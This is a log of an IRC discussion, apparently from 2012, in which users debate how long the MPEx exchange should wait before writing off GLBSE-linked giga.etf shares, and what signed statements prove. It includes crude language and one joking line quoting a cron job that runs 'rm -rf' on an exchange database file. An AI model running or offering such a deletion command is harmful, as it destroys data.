it in a time-limited way Oct 31 05:08:14 i can't accept eternal burden of any-and-all 2' Oct 31 05:08:19 that could or may be conceived. Oct 31 05:08:43 this is a facinating issue to me :) Oct 31 05:09:03 it is a pretty important point for btc in general, which is why i'm taking the time Oct 31 05:09:19 conveniently BTC-Mining is taking the other side, i'm not sure i'd prefer anyone else for it. Oct 31 05:10:05 You are not an unvoluntary bailee. You received the assets of your own will and held them of your own will for the purpose of selling claims to it. You never received them against your will. In fact, they're currently TAKEN AWAY from you against your own will. Not forced upon you. Oct 31 05:10:11 yes, the assets. Oct 31 05:10:15 BTC-Mining: didn't you claim to have bought a bunch of f.giga when glbse went down? Oct 31 05:10:19 but not some-other-thing-which-aren't-the-assets. Oct 31 05:10:57 How are you the unvoluntary bailee of those other things? Oct 31 05:11:12 wait, do we really consider having stuff associated with your glbse account ownership? (maybe off topic) Oct 31 05:11:38 Aka, the giga.etf Oct 31 05:12:01 BTC-Mining because the vehicle for my ownership was the glbse share Oct 31 05:12:04 which now is no more. Oct 31 05:12:18 it has in practice been replaced by a vague sort of claim thing. Oct 31 05:12:38 The claims were sold to me. I'm the current holder. You are not. You are the issuer. You cannot be the unvoluntary bailee of your own issue. Oct 31 05:12:48 alology: Oct 31 05:13:14 mircea_popescu leased an office in a building, the building is taken out by a tornado Oct 31 05:13:27 (leased to someone else) Oct 31 05:13:56 is mircea_popescu still responsible to provide an office to that person? Oct 31 05:14:18 assumes there was not a force majeure clause in the lease Oct 31 05:14:41 smickles no, it's more complicated. person A leases a building to person B. person B leases office space to C. person A is arrested and the building confiscated. C demands from B that B ensures C gets the office space at a future time if the building is returned to A. Oct 31 05:15:28 this makes B the involuntary bailee of C's claim, because B never leased to C any such thing as "future claims to the office space conditional on A's performance in court" Oct 31 05:15:43 while C may be entitled to that claim, it's really not much of B's business. Oct 31 05:16:02 hmm Oct 31 05:17:03 No. B indeed (re)leased office space to C. Oct 31 05:18:13 To be the involuntary bailee, you'd have to be holding the claim from C to A. Where you could throw out the claim or quite simply give it to it's actual beneficiary. Oct 31 05:19:07 BTC-Mining there's no limitation that you can only be ib if you can divest in a manner convenient to all partsi nvolved Oct 31 05:19:09 quite the contrary. Oct 31 05:19:26 anyway, even the example as given is simplified, because it gonflates giga and glbse into A. Oct 31 05:19:39 Yes. Indeed. Oct 31 05:19:55 and at any rate the whole involuntary bailee point is mostly academic, it just rehashes the obvious "tough tits" line Oct 31 05:20:13 we only got into that cause smickles brought it up, but otherwise, the point is more along the lines of, Oct 31 05:20:21 some time limit will have to be enforced. why this rather than that ? Oct 31 05:20:34 [MPEX] [S.MPOE] 11000 @ 0.00045794 = 5.0373 BTC [-] Oct 31 05:21:07 Because it's perfectably expectable for information to be released in more than a month, while it is not in 10 years without any news. Oct 31 05:21:25 in principle the same could be said of 10 years vs 1000 years. Oct 31 05:21:42 Why? Oct 31 05:22:09 cause it's purely arbitrary. yes, the chances to get something decrease with time. so, if nothing happens in one week, better wait a month. Oct 31 05:22:19 if nothing happens in am onth, better wait two. if nothing happens in two better wait six Oct 31 05:22:20 etc. Oct 31 05:22:41 mircea_popescu: lets do this logically, you made the first positive claim right? Oct 31 05:22:42 still doesn't indicate why six months is more reasonable than six weeks Oct 31 05:22:54 smickles what i indicated was 10 dividend periods. Oct 31 05:23:05 i don't claim it's perfect or anything, should carry the day Oct 31 05:23:06 then BTC-Mining contested, right Oct 31 05:23:11 i just didn't hear anything more reasonable. Oct 31 05:23:22 smickles well we agreed on principle but not on the actual interval so far. Oct 31 05:23:32 so how do you justify 10 difidend periods? Oct 31 05:23:42 In 10 years, odds of data remaining gets slight, especially as the storage on which the data was is probably destroyed and unless some guy (who never gave news or disclosed this date), kept moving it to new storage as time went by, the data would be lost. Which is expectable and probable. Why would the guy keep to back it up if he's not disclosing it? Oct 31 05:24:02 smickles degree of magnitute more than the smallest contractual breach Oct 31 05:24:26 BTC-Mining yes, they will be slight, by today's measure. cause today the scent is still fresh. but in 9 years it will seem reasonable to wait 100 rather than 10. Oct 31 05:24:33 BTC-Mining: do you contest this 'order of magnitude' argument? Oct 31 05:24:54 why'd he have to contest it Oct 31 05:24:59 logic Oct 31 05:25:05 that's kinda absurd, we'll never be done if we go that way Oct 31 05:25:06 No. Because it has to be set as a hard limit. Oct 31 05:25:09 we just contest ad infinitum Oct 31 05:25:15 But by today's standard. Oct 31 05:25:24 more constructively, do you have something better than that, i'd want to know Oct 31 05:25:40 Not by reviewing them later as: "Well we went on waiting 10 years, why not 100?" Oct 31 05:25:52 BTC-Mining but that's exactly what we're doing today. Oct 31 05:25:57 And 1 month does not seems appropriate. Oct 31 05:26:03 I'm contesting that. Oct 31 05:26:04 we waited a month, and you are saying "well we should wait six cause this guy is slow" Oct 31 05:26:04 mircea_popescu: you'd only do it back to first principles, not ad infinitum Oct 31 05:26:21 and if you disagree on first principles, one of you is a turnip Oct 31 05:26:27 lol Oct 31 05:26:29 I'm not contesting it 1 month after. I'm contesting the fact you chose 1 month from day 1. Oct 31 05:26:44 BTC-Mining sorry what ? Oct 31 05:27:24 "[23:25] we waited a month, and you are saying "well we should wait six cause this guy is slow"" Oct 31 05:27:31 right. Oct 31 05:27:35 We didn't wait a month, that's the thing. Oct 31 05:27:35 mod6: http://www.businessinsider.com/top-25-richest-hedge-funds-2012-1 Oct 31 05:27:47 what did we do ? Oct 31 05:28:15 copumpkin o wow, tyggr ?! Oct 31 05:28:19 lol Oct 31 05:28:21 GLBSE.com went offline. You decided to, right now, allow 1 month. Oct 31 05:28:28 little did you know that Chaang-Noi was a hedge fund manager Oct 31 05:28:33 I'm contesting that this decision is appropriate for right now. Oct 31 05:29:00 And not contesting afterward saying we should wait more. Oct 31 05:29:09 but see, glbse.com going offline is really the absolute last signal of dissapearance. Oct 31 05:29:16 nefario went silent, before this. their board broke apart. Oct 31 05:29:23 the guy got a scammer tag for chrissakes Oct 31 05:29:24 I would have no problem accepting it if I had agreed the delay was reasonable, and waited the whole of that delay. Oct 31 05:29:29 this was the last ditch of credibility left. Oct 31 05:29:33 what's left now ? Oct 31 05:30:34 He got a scammer tag because Theymos was a shareholder and got screwed in this because Nefario doesn't recognize their decisive power because he claims he can't honor requests that would make him break the law. Oct 31 05:30:43 man, forget the because. look at things objectively. Oct 31 05:30:57 I does not prevents him from disclosing the information. Oct 31 05:31:01 is the guy here defending himself ? no, he's not. is the company still standing ? no, it was dissolved (retroactively). Oct 31 05:31:08 is his reputation in good standing ? no, it's not. Oct 31 05:31:13 is the website online ? neither. Oct 31 05:31:17 what is left to hang hope on ? Oct 31 05:32:09 Eh, I thought so too. 1 month is just a token period. You'd erase the data right away if it wouldn't raise protest. You already consider it gone. Oct 31 05:32:24 i wouldn't erase the data right away on general principle. Oct 31 05:32:46 and afaik at least one glbse failure was already resolved, without protest for that matter. Oct 31 05:34:12 copumpkin paulson in 2nd place, that must have gone over well Oct 31 05:34:14 So why not have a more reasonable delay, on general principal. Balances have been partially paid out. Nefario communicated with the shareholder his intent to not act upon their vote if it was not lawful to do so. Oct 31 05:35:02 mircea_popescu: cause he fucked up so badly? :P Oct 31 05:35:16 BTC-Mining the sticking point is the reasonable part of more reasonable. Oct 31 05:35:17 oh well, he's rich, doesn't care Oct 31 05:35:22 You're treating it like every other Bitcoin scam with the equivalent delays before declaring it lost. Oct 31 05:35:24 copumpkin o he cares. Oct 31 05:35:36 mircea_popescu: monopoly? Oct 31 05:35:46 nah im about to call it a night soon Oct 31 05:35:58 BTC-Mining ask copumpkin, i was pushing for pirate write-offs in august. Oct 31 05:36:07 not that anyone listened then or anything. Oct 31 05:36:10 oh mircea_popescu was pushing! Oct 31 05:36:20 oh well :) Oct 31 05:36:21 people seem more religious than business-oriented in btc. Oct 31 05:36:30 teh saviour shall come sort of outlook Oct 31 05:36:40 I wonder what he's doing with all the money Oct 31 05:36:44 not that he got any out of me Oct 31 05:36:44 messiah ? Oct 31 05:36:47 So was I. I could almost have expected to write it off almost right away. Oct 31 05:37:01 But to my surprise, balances actually started to be paid. Oct 31 05:37:10 you mean pirate ?! Oct 31 05:37:19 No, GLBSE. Oct 31 05:37:21 o you mean enfario ya Oct 31 05:37:44 yes man, which is why we weren't having this conversation on the 15th Oct 31 05:38:19 but i stil lfail to see how the whole month of november is an unreasonable allowance to fucking pull some fields from a db and send them to peopkle Oct 31 05:38:26 So on that account, I think delays should be set as such to allow the benefit of doubt that Nefario intends to repay. Oct 31 05:38:35 i thought they are ;/ Oct 31 05:38:58 Because Nefario DOES NOT WANT to simply pull the database's fields and send that. Oct 31 05:38:58 for instance patrickharnett is getting axed tomorrow on the dot. Oct 31 05:39:08 o, he doesn't want to does he ? Oct 31 05:39:13 and you figure this matters ? Oct 31 05:39:30 Yes. Oct 31 05:39:40 well, i don't. why do i care what someone wants ? Oct 31 05:40:03 what is this, college ? Oct 31 05:40:35 lol Oct 31 05:40:39 you would, too. Oct 31 05:40:47 nah, I actually didn't join a frat in college Oct 31 05:40:52 thought all that drinking was kind of stupid Oct 31 05:41:01 it sure is. Oct 31 05:41:05 I don't mind moderate amounts of it, but doing it for its own sake is silly Oct 31 05:41:05 You're unilaterally taking a decision to void claims because Nefario does not release information fast enough for you, regardless of it it will be released or not. Oct 31 05:42:08 BTC-Mining yes, that's the principle of the thing. when someone says they do something and then they don't do it, they get some time before being cut off Oct 31 05:42:16 regardless if they "will" do it or not. Oct 31 05:42:35 foreclosure works the same exact way, for instance. Oct 31 05:43:02 Yes, but the delays should be set accordingly to the expected time it will take them to do so, and you usually add an extra on that in case. Oct 31 05:43:13 the expected time to pull data from db is 5 minutes. Oct 31 05:43:20 1 + 1 months > 5 minutes Oct 31 05:43:21 problem ? Oct 31 05:44:17 That's the thing. You'd be disregarding all possible laws Nefario might want to comply to by selecting that 5 minute delay. Oct 31 05:44:28 that 5 minute delay is how long it takes to do it. Oct 31 05:44:39 you know, like if you don't make the mortgage payments cause your cat was sick Oct 31 05:44:44 the bank would still fuck you. Oct 31 05:45:15 It's how long it takes to retrieve it from the database. Not how long it takes to disclose it for some paranoid fuck who just started consulting a lawyer. Oct 31 05:45:30 And now wants to close it legally. Oct 31 05:45:36 dude... there's no doctrine of "how long it takes some mentally retarded guy to pay the bill" Oct 31 05:45:57 it's how long the thing takes, not how long the thing takes nefario. Oct 31 05:46:04 03:42 < BTC-Mining> Yes, but the delays should be set accordingly to the expected time it will take them to do so, and you usually add an extra on that in case. << the expecte time for him to release the shareholder info should've been about a week Oct 31 05:46:28 if he's bound by laws, he can tell us what those laws are, at least Oct 31 05:46:34 you can't cite unknowable lawyerspeak Oct 31 05:46:37 as an excuse Oct 31 05:46:48 and it can't just be "the law" Oct 31 05:46:56 since that just looks like shitty excuses for not getting your shit done Oct 31 05:47:08 copumpkin fwiw, i contacted his theoretical lawyer about two weeks ago. Oct 31 05:47:09 no reply. Oct 31 05:47:10 copumpkin: but it's santa cLAWs Oct 31 05:47:15 lol Oct 31 05:47:21 mircea_popescu: sounds legit Oct 31 05:47:27 i mean... all this isn't for lack of trying Oct 31 05:47:35 [MPEX] [S.MPOE] 28000 @ 0.00045797 = 12.8232 BTC [+] Oct 31 05:47:36 [MPEX] [S.MPOE] 17632 @ 0.00045794 = 8.0744 BTC [-] Oct 31 05:47:37 [MPEX] [S.MPOE] 4668 @ 0.00045764 = 2.1363 BTC [-] Oct 31 05:47:37 it's for lack of absolutely any reasonable alternative. Oct 31 05:47:39 mircea_popescu: reminds me of this email I got this morning: http://snapplr.com/rv62 Oct 31 05:47:47 The expected time it will take, not in as fast you could do it, but how fast it could be expected to be done according to how it's been said it's going to be done. Oct 31 05:47:59 dear, sounds legit. Oct 31 05:48:07 mircea_popescu: omg, that's exactly what I said Oct 31 05:48:15 great minds Oct 31 05:48:26 BTC-Mining no such license eh. for one, how it was said it was going to be done is "instant". check out the guy's presentations at his nonference Oct 31 05:49:09 That's not what he claimed when closing GLBSE. Oct 31 05:49:17 at any rate find me some place nefario says "and btw, if glbse goes down i will take ~6 months to release infos" on or around april 11, 2012 Oct 31 05:49:30 dude, what he claimed in october has no bearing on some instrument made in april does it. Oct 31 05:49:57 mircea_popescu: april 1, 2012 Oct 31 05:50:03 Nowhere does he states how much time he will take to do it. Just that he's suddenly very concerned by a few regulations. Oct 31 05:50:04 april fools day Oct 31 05:50:11 twas 11 Oct 31 05:50:22 @.@ Oct 31 05:50:36 i'm sure it's april fools day even if it was the 11th Oct 31 05:50:42 lol Oct 31 05:50:58 BTC-Mining why do you think it matters what nefario said after the giga.etf thing was made ? Oct 31 05:51:31 Because he has the damn information to release and you have the claims to the shares I have claims to. Oct 31 05:51:42 so listen, if i run a payday loan service, and i lend some guy 50 bucks for a week Oct 31 05:51:47 mircea_popescu: have you asked gigga if he'll honor your shares for the etf? Oct 31 05:51:50 and his employer announces that next salary will be paid in 2050 Oct 31 05:51:54 i have to extend my loan to 2050 ? Oct 31 05:52:07 smickles i won't ask such a thing, it's absurd. Oct 31 05:52:20 No. Because that's 40 years. It's unreasonable. Oct 31 05:52:28 2015 ? Oct 31 05:52:53 I'd accept 6 month as a minimum. Oct 31 05:52:55 and without a declared timeframe from nefario, i'm starting to think that we can't reasonably expect to get the data in a reasonable amount of time Oct 31 05:53:00 ahah you and your 6 months Oct 31 05:53:09 i wouldn't accept one day. a week's a week. fuck you, pay me. Oct 31 05:53:20 Let me try to explain it from my point of view. Oct 31 05:53:38 mircea_popescu: go to missouri eviction legal with one day of default Oct 31 05:53:45 smickles if he had the common courtesy to say you know, on oct 1, we are closed, i expect to pay everyone by the end of this week and release data by the end of the month cause so and so problems Oct 31 05:53:49 and then BLEW both dates Oct 31 05:53:55 i'd still be waiting for him. Oct 31 05:55:42 mircea_popescu: yeah, but releasing the data by the end of the month is unreasonably long, unless he could point to a specific detail (law) which prevented him from doing so in that time frame Oct 31 05:56:12 smickles but at least it'd be you know... he said by today, it's not done yet... well let's give it a little and see Oct 31 05:56:25 it'd be... something. Oct 31 05:56:35 i have no patients for giving people a little more time Oct 31 05:56:45 they take my spelling away from me Oct 31 05:56:49 haha. Oct 31 05:57:01 btw copumpkin have you noticed the "refards" signature in that email ? Oct 31 05:57:05 originally i read "retards" Oct 31 05:57:09 yeah, there are lots of typos Oct 31 05:57:10 lol Oct 31 05:57:16 I didn't see that Oct 31 05:57:35 What that 1 month tells me is because Nefario completly fucked up, although you know about it and although you know he further screwed on the 16th and you know he's never been quite good at PR, because it could be done in 5 minutes by you (which you know won't happen) or that he might never disclose it (again, a possibility, not an absolute), you can't be assed to extend the courtesy Oct 31 05:57:35 of not pressing "delete" on all the data for the ETF's for your customers' sake. Oct 31 05:58:42 this is such complete misrepresentation. Oct 31 05:58:56 since for instance i announced the exact time, what's to keep customers from just saving a stat ? Oct 31 05:59:11 BTC-Mining: i've lost too high a % of my net worth by extending people courtesies to continue the practice Oct 31 05:59:44 You said YOURSELF you won't honor the statements if the information is released after December 1st. Oct 31 05:59:49 < mircea_popescu> since for instance i announced the exact time, what's to keep customers from just saving a stat ? Oct 31 05:59:52 + Oct 31 05:59:56 What good would prior notice and saving the statement do? Oct 31 06:00:18 doesn't that imply he'll honor them before dec 1? Oct 31 06:00:30 just STAT b/f dec 1 Oct 31 06:00:48 BTC-Mining it at the very least changes the customer's position not one bit. Oct 31 06:00:51 save it, send it off to amazon glacier Oct 31 06:01:14 you were talking about "data being deleted". a customer wanting to push a claim would be in no worse position today, on the 5th of december 2012 or 2015 Oct 31 06:01:53 So? Oct 31 06:02:18 so at the very least under the guise of protecting your interest you're trying to tell me how to sort my files lol Oct 31 06:02:25 which is hardly something you should be involved in ?! Oct 31 06:04:20 there's two different things here, do you realise this ? your ability to prove that you owed X shares of Y is never going away. that's why you get stats. Oct 31 06:04:31 (and that's why the mpex system is so good, incidentally) Oct 31 06:05:21 It WOULD be good if you didn't keep any profit from that decision from GIGAMINING shares and donated it to a charitable cause. Oct 31 06:05:52 It WOULD be good if you told Gigavps you were writing them off and we could give him those signed statements Oct 31 06:06:02 BTC-Mining: i bet, that presenting a stat after info is released would get your benefit back Oct 31 06:06:17 .2btc BTC-Mining ? Oct 31 06:06:25 even odds? Oct 31 06:06:30 well or alternatively he could "sue" me on injust enrichment or w/e Oct 31 06:06:39 1:2? Oct 31 06:06:47 No, Mircea clearly stated it would not give my benefit back. Oct 31 06:07:10 After December 1st, if assets information is released, he won't honor any statements. Oct 31 06:07:22 He'll just donate the proceeds. Oct 31 06:07:26 i took that to mean a stat made after dec 1 Oct 31 06:07:47 "my bad" i suppose Oct 31 06:07:56 After december 1, no STAT will include any ETF holding because data will have been removed... Oct 31 06:08:03 right. Oct 31 06:08:04 so it will not be possible. Oct 31 06:08:07 no Oct 31 06:08:14 it will, just STAT b/f dec 1 Oct 31 06:08:17 and keep it Oct 31 06:08:22 it's a signed receipt Oct 31 06:08:44 one local, one local bacup, one offsite backup Oct 31 06:09:11 burden of proof is on the person making the positive assertion Oct 31 06:09:27 (i.e. in this situation, the f.giga holder) Oct 31 06:09:38 but that's the thing, Mircea said he would not accept any signed statement or backup of his database if asset information is disclosed after December 1st (from GLBSE part) Oct 31 06:10:13 Not about statments from MPEx coming after december 1st because there would be none. Oct 31 06:10:13 (Info about the ETF) Oct 31 06:10:29 actually what it says is "held discarded as worthless" Oct 31 06:10:31 yeah, well, i'm inclined to agree with that course of action myself : Oct 31 06:10:36 "shares held discarded as worthless" Oct 31 06:11:49 it specifically does not say what happens if they even later prove to have been mistakenly discarded as worthless (as in, are worth something). Oct 31 06:12:16 but as explained above, this does not actually degrade anyone's ability to prove that they did own them at some point. Oct 31 06:12:41 But what good would that do to be able to prove you owned them at some point? Oct 31 06:13:02 [MPEX] [S.MPOE] 26000 @ 0.00045764 = 11.8986 BTC [-] Oct 31 06:13:31 now how would i know that ? Oct 31 06:14:11 [MPEX] [S.MPOE] 40699 @ 0.00046007 = 18.7244 BTC [+] Oct 31 06:14:12 [MPEX] [S.MPOE] 22700 @ 0.00046017 = 10.4459 BTC [+] Oct 31 06:14:14 [MPEX] [S.MPOE] 53175 @ 0.00046137 = 24.5333 BTC [+] Oct 31 06:14:15 [MPEX] [S.MPOE] 12469 @ 0.00046613 = 5.8122 BTC [+] Oct 31 06:14:16 [MPEX] [S.MPOE] 8239 @ 0.00046631 = 3.8419 BTC [+] Oct 31 06:14:16 So the signed statements are pretty much... pointless, then. Oct 31 06:14:17 [MPEX] [S.MPOE] 25814 @ 0.00046695 = 12.0538 BTC [+] Oct 31 06:14:18 [MPEX] [S.MPOE] 43500 @ 0.00047111 = 20.4933 BTC [+] Oct 31 06:14:19 [MPEX] [S.MPOE] 8271 @ 0.00047152 = 3.8999 BTC [+] Oct 31 06:14:19 [MPEX] [S.MPOE] 29917 @ 0.0004727 = 14.1418 BTC [+] Oct 31 06:14:20 [MPEX] [S.MPOE] 6000 @ 0.000475 = 2.85 BTC [+] Oct 31 06:14:21 [MPEX] [S.MPOE] 11318 @ 0.00048 = 5.4326 BTC [+] Oct 31 06:14:22 [MPEX] [S.MPOE] 28000 @ 0.00048021 = 13.4459 BTC [+] Oct 31 06:14:23 [MPEX] [S.MPOE] 15864 @ 0.00048051 = 7.6228 BTC [+] Oct 31 06:14:24 [MPEX] [S.MPOE] 3600 @ 0.00048135 = 1.7329 BTC [+] Oct 31 06:14:25 [MPEX] [S.MPOE] 4644 @ 0.00048155 = 2.2363 BTC [+] Oct 31 06:14:26 [MPEX] [S.MPOE] 27800 @ 0.00048252 = 13.4141 BTC [+] Oct 31 06:14:28 [MPEX] [S.MPOE] 33300 @ 0.00048422 = 16.1245 BTC [+] Oct 31 06:14:28 [MPEX] [S.MPOE] 9712 @ 0.0004874 = 4.7336 BTC [+] Oct 31 06:14:29 [MPEX] [S.MPOE] 14978 @ 0.00048788 = 7.3075 BTC [+] Oct 31 06:14:32 mmm Oct 31 06:14:45 how do you judge ? Oct 31 06:14:48 mircea_popescu: directly, if I had proof that i owned f.gigg.etf on dec 1, would you give me fair value of those shares at any point in the future if i relinquish my ownership of them? Oct 31 06:15:34 Seriously, why do you even have them if you nor anyone else accepts them? Oct 31 06:16:10 Okay, let's take it from another angle. Oct 31 06:16:14 smickles i will (and always have) satisfy legitimate claims against myself. Oct 31 06:16:25 now, it'll all come down to whether your claim is legitimate at thatp oint. Oct 31 06:16:29 there you have it BTC-Mining Oct 31 06:16:39 BTC-Mining your rights are your rights man. Oct 31 06:16:41 What? Oct 31 06:16:43 they're not a function of someone else. Oct 31 06:17:14 I'm really confused... can't you just say if you'll honor or not a valid claim to any shares? Oct 31 06:17:28 no, cause it's a future question and i don't know the contingencies. Oct 31 06:17:43 Ah, I see... Oct 31 06:17:52 That kind of changes everything tho. Oct 31 06:17:56 people were asking me, oh, what about upgrade to tera Oct 31 06:18:08 and i had to stick to "all i'll do is pass along all that's passed to me" Oct 31 06:18:19 I have two question then. Oct 31 06:18:24 because i can't make future viewing statements on contingencies like that. Oct 31 06:18:40 turns out i was responsible to do it, too, cause it prevented teh crisis from compounding to some degree. Oct 31 06:19:55 Ok, so all signed statement has a CERTAIN claim value, but you won't pronounce yourself on that value until you know the facts regarding the future situation for such claims. Oct 31 06:20:43 well yes. Oct 31 06:21:42 and i fully appreciate it may seem insane or w/e, but the fact of the matter is we are involved in very complex transactions and the only way to do all this is to do it CORRECTLY Oct 31 06:21:55 We could have stopped this conversation 2 hours ago if you simply and clearly stated it that way then... Oct 31 06:22:00 or we might as well not even bother Oct 31 06:22:07 Because that is PERFECTLY fine with me. Oct 31 06:22:19 BTC-Mining lol we talked of this before, i have no way of knowing from the onset what exactly is the form that's clear to you Oct 31 06:22:27 Even with 1 month delays or even 1 week delays would be fine with me then... Oct 31 06:22:36 right. Oct 31 06:22:55 well, i don't think it was wasted time, something tells me this discussion will form precedent for many later discussions. Oct 31 06:23:00 possibly after we're all dead. Oct 31 06:23:08 If you don't want to pronounce yourself on something with unkown variables, just state it. Oct 31 06:23:32 I would then consider it fine. Oct 31 06:23:59 lol you know i could say "if you only asked this two hours ago" just as well :p Oct 31 06:24:12 I understood it as any signed statement by MPEx would never ever be accepted in any circumstance by MPEx. Oct 31 06:25:07 I think I asked something like, would you honor a signed statement? Which you answered as "No" Oct 31 06:25:35 But I guess you were answering to the litteral sense of my question... Oct 31 06:26:51 [22:21] Will you honor the most recent data available as of who owns what of the ETF should the information be disclosed and you get access to the funds received through it? Oct 31 06:26:51 [22:21] I guess would be were I'm getting at. Oct 31 06:26:51 [22:22] 30 years later? Oct 31 06:26:51 [22:22] lol srsly. Oct 31 06:26:51 [22:22] ;P Oct 31 06:26:51 [22:22] Yes. Oct 31 06:26:51 [22:22] nope. Oct 31 06:27:03 I think that part 2 hours ago is where it happened... Oct 31 06:27:48 but you said yes to smickle's 30 years and i said nope Oct 31 06:28:28 No, I stated afterward I answered yes to your "lol srsly" as if it was an answer to my question. Oct 31 06:28:52 I never addressed smickles or what he said at that point. Oct 31 06:29:01 ya well i dropped that part so. Oct 31 06:29:16 After that statement, I think it went unnanswered and we kind of dropped getting anything clear out of it =/ Oct 31 06:29:40 anyway, ima clean this and put it up for later. Oct 31 06:29:56 Well, if you don't mind, I have 2 final question. Oct 31 06:30:13 sure. Oct 31 06:30:59 oh gawd, i'm going to be in one of your posts looking silly again arn't i? Oct 31 06:31:46 Suppose your ETF has 1000 units. Someone has 900 shares and a signed statement from November the 29th. Someone has 100 units and 10 accounts, and 10 statement from the 30th of november for 100 units, one for each of those accounts. Oct 31 06:32:33 You would need the most recent database backup to identify legitimate claims would you not? Oct 31 06:34:21 The first person never sold his 900 units and the other transfered the units from one account to the other to get his 10 statements. Oct 31 06:35:17 transfers have nothing to do with this tho. Oct 31 06:35:43 i think something flew over your head Oct 31 06:35:57 you for some reason seem to be mixing historical data with active data. Oct 31 06:36:10 i'm not about to delete f.giga.etf entries from the historical records. Oct 31 06:36:31 You're going to KEEP the trading data? Oct 31 06:36:35 it's still a good idea to copy the db dump on dec 1 Oct 31 06:36:44 of course ?! Oct 31 06:36:58 I understood it as you were going to delete ALL data... Oct 31 06:37:04 ffs. Oct 31 06:37:10 what, am i going to log into twitter and delete tweets ? Oct 31 06:37:21 contact everyone on irc list to the right ask them to wipe selected lines from their logs ? Oct 31 06:37:29 mircea_popescu: do be sure to include my witty remark if you can :) Oct 31 06:37:35 lol Oct 31 06:38:01 that was a looooong way to get a short distance Oct 31 06:38:07 Mircea, but those twitter/IRC log does not contain who the shares are sent to. Oct 31 06:38:38 and account transfers are not public Oct 31 06:38:46 BTC-Mining think for a moment, logically. in any possible implementation there'd be some dbs which hold records of what has happened. such as, who transfered what to whom, in sale or otherwise. Oct 31 06:38:55 and also, some records that'd keep balances. Oct 31 06:38:57 Yes Oct 31 06:39:10 conceivably, one'd care to keep these later trimmed seeing how they're pounded possibly 1000s of times a second Oct 31 06:39:35 one'd not give a shit about the former, and even keep most of them off the active db cause mpex doesn't need to review trade #5 at any point in november 2012 Oct 31 06:40:01 Aye Oct 31 06:40:04 so then ? Oct 31 06:40:04 mod6: LURCKER! Oct 31 06:40:12 mod6 :p Oct 31 06:40:19 [MPEX] [S.MPOE] 7132 @ 0.00045764 = 3.2639 BTC [-] Oct 31 06:40:20 [MPEX] [S.MPOE] 28200 @ 0.00045764 = 12.9054 BTC [-] Oct 31 06:40:22 [MPEX] [S.MPOE] 5868 @ 0.00045762 = 2.6853 BTC [-] Oct 31 06:40:51 haha, i was afk, then scrolled back. was thinking "didn't we just have this conversation an hour ago?!" Oct 31 06:40:57 lol Oct 31 06:41:02 yes, we were. Oct 31 06:41:23 Aye, but that means signed "STAT" statements are not useful at all to prove ownership of anything at any point other than the moment it was created. Oct 31 06:41:33 I know for a fackt that mircea_popescu has a cron job of rm -rf /home/user/mpex/db.sql Oct 31 06:41:45 Meaning you need the actually trading statements to identify legitimate holders. Oct 31 06:42:10 signed stats do exactly what they do : they show that at time X you had Y. Oct 31 06:42:17 no more, no less. this is the most they could do, too. Oct 31 06:42:54 So you would, theorically, need a database backup to be used in a claim. Signed "STAT" statements are not receivable. Oct 31 06:43:16 what's not receivable mean ? they're not negotiable instruments, no. Oct 31 06:44:08 but the chain of dispute is very simple and efficient. let me explain it. Oct 31 06:44:15 I. Person complains about MPEx. Oct 31 06:44:17 Not as in negociable instruments. Receivable has offering any proof of ownership later than the date it was issued. Oct 31 06:44:29 either person has or has not a stat to back their complaint. if they do not, complaint is invalid. Oct 31 06:44:42 Mircea: yes Oct 31 06:44:45 II. MPEx reviews complaint. either it has or it has not ulterior transactions signed by person Oct 31 06:44:50 if it does the complaint is invalid. Oct 31 06:44:53 end of dispute. Oct 31 06:45:21 there's no guessing involved in any of this. Oct 31 06:45:26 wow, you have written policy, don't you, I've gone thru this exact proceeding Oct 31 06:45:30 So you need to keep all transactions data for that, as proof we signed them at a later date. Oct 31 06:45:41 smickles yes. Oct 31 06:45:47 BTC-Mining yes. Oct 31 06:46:01 And as such will keep the transactions data for the ETF. Oct 31 06:46:19 the transaction (in general, the historical) data was never in discussion. Oct 31 06:46:37 clever girl Oct 31 06:46:44 When you said you'd delete ALL data for the ETF, I understood it as ALL the data. Including signed transactions... Oct 31 06:46:58 i didn't say i delete all data lol. i said the shares are discarded as worthless Oct 31 06:47:11 Wait... let me fetch the bit... Oct 31 06:47:23 oh snap, mircea_popescu Oct 31 06:47:25 wtf, delete signed orders create chaos. heck, why not, lets have fun Oct 31 06:47:37 \o\ Oct 31 06:47:44 lol whazzat smickles ? Oct 31 06:47:57 he's going to quote you saying something Oct 31 06:48:13 no harm in that eh Oct 31 06:48:21 02:18 < mircea_popescu> BTC-Mining i can't delete "all data" man. the signed stats will forever exist. Oct 31 06:48:35 04:01 < mircea_popescu> you were talking about "data being deleted". a customer wanting to push a claim would be in no worse position today, on the 5th of december 2012 or 2015 Oct 31 06:48:39 04:35 < mircea_popescu> i'm not about to delete f.giga.etf entries from the historical records. Oct 31 06:48:43 04:37 < mircea_popescu> what, am i going to log into twitter and delete tweets ? Oct 31 06:48:47 ya well Oct 31 06:48:50 04:46 < mircea_popescu> i didn't say i delete all data lol. i said the shares are discarded as worthless Oct 31 06:48:57 04:47 < mircea_popescu> wtf, delete signed orders create chaos. heck, why not, lets have fun Oct 31 06:49:09 last 1000 lines, every time mircea_popescu said delete Oct 31 06:49:18 haha fun times Oct 31 06:49:20 all time UTC Oct 31 06:49:23 *times Oct 31 06:49:59 maybe it was on reddit Oct 31 06:50:18 i've not been on reddit today, you;ve kept me busy Oct 31 06:50:39 mircea_popescu: is your reddit user private or something? Oct 31 06:50:52 http://www.reddit.com/user/mirceapopescu <> page not found Oct 31 06:51:19 nope Oct 31 06:51:25 its beleeted!!1 Oct 31 06:51:42 (ftr, i see it fine) Oct 31 06:52:28 Mea culpa I guess. You were talking about how it's unreasonable to keep the data indefinitly. I understood it as all the data. I pointed out I was annoyed by this. Oct 31 06:52:50 [21:07] Keeping the data aside doesn't cost much logistically. Oct 31 06:52:50 [21:07] well, it is kept aside if you keep your stats. Oct 31 06:52:50 [21:08] mpex isn't designed to be a sort of glbse Oct 31 06:53:01 I completly missed that second line. Oct 31 06:53:27 :p Oct 31 06:53:43 Well actually, I understood it badly. Oct 31 06:53:52 BTC-Mining will now be punished to copy by hand http://trilema.com/2012/bitcoin-wittgenstein-assets/ ten times Oct 31 06:54:07 for misstating facts, jumping to conclusions and other crmes Oct 31 06:54:37 I understood it as data would be preserved within the saved "stat" data. Oct 31 06:54:56 nah, really, it's a more complex scheme. Oct 31 06:54:58 Not that related transaction data would be kept and compared against Oct 31 06:55:02 made out of parts as it were Oct 31 06:55:03 mircea_popescu: http://i.imgur.com/lumDI.png Oct 31 06:55:26 smickles seems we've been separated! Oct 31 06:55:58 whoa proxy 404s me too Oct 31 